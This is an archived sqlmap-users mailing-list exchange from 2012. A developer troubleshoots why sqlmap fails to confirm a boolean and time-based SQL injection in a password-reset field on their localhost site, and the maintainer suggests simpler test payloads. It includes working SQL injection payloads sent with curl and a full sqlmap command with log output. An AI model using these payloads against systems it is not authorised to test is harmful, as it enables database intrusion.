Re: [sqlmap-users] sqlmap wont find an "AND boolean/time" based sqli
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] sqlmap wont find an "AND boolean/time" based sqli
|
From: Miroslav S. <mir...@gm...> - 2012-01-07 16:24:42
|
Hi. This looks strange: 1'%20OR 1=1 AND 1='1 and 1' OR 1=1 AND 1='2 Could you please try to find the simplest vectors/payloads that work, e.g.: 1' AND '1'='1 1' AND '1'='2 >From this payloads I am not sure why is there OR 1=1 and how is this evaluated to True or False (as OR 1=1 should evaluate in normal cases to True in both vectors you've sent) Kind regards On Sat, Jan 7, 2012 at 5:10 PM, cats <du...@al...> wrote: > Ok so I know that my site has an sqli (and boolean/mysql time based). > I even tried both of them myself and the results are very clear and > simple, yet sqlmap doesn't seem to see it. It can find the time based at > first, but it always ends up saying that it's a false positive. > > cURL will give me the following result from the page, using "and boolean > based sqli" with a true statement: > > curl --data "lostpass=1'%20OR 1=1 AND 1='1" > http://localhost/account/index.php > > <div class='message' style='padding:10px;'>Your password was e-mailed to > 1' OR 1='1</div> > > > And now a false one > > curl --data "lostpass=1' OR 1=1 AND 1='2" > http://localhost/account/index.php > > > <td class='message'>The email address you entered 1' OR 1=1 AND 1='2 > does not exist</p> > > > I have tried with --string and --text-only with sqlmap, but I get the > same results over and over. Here's some sample output: > > python sqlmap.py -u "http://localhost/account/index.php" --random-agent > --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to" > --text-only --delay=5 --technique=TB > > > [16:57:34] [INFO] testing connection to the target url > [16:57:49] [INFO] heuristics detected web page charset 'ascii' > [16:57:50] [INFO] testing if the provided string is within the target > URL page content > [16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic > [16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic > [16:58:13] [INFO] POST parameter 'lostpass' is dynamic > [16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass' > might not be injectable > [16:58:19] [INFO] testing sql injection on POST parameter 'lostpass' > [16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > [16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > [17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND > time-based blind' injectable > [17:00:48] [INFO] checking if the injection point on POST parameter > 'lostpass' is a false positive > [17:03:09] [WARNING] false positive injection point detected > [17:03:09] [WARNING] POST parameter 'lostpass' is not injectable > [17:03:09] [CRITICAL] all parameters appear to be not injectable. > > I tried with a sleep(5) injection manually as well, and it works like a > charm. Any ideas? > > > > > > > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
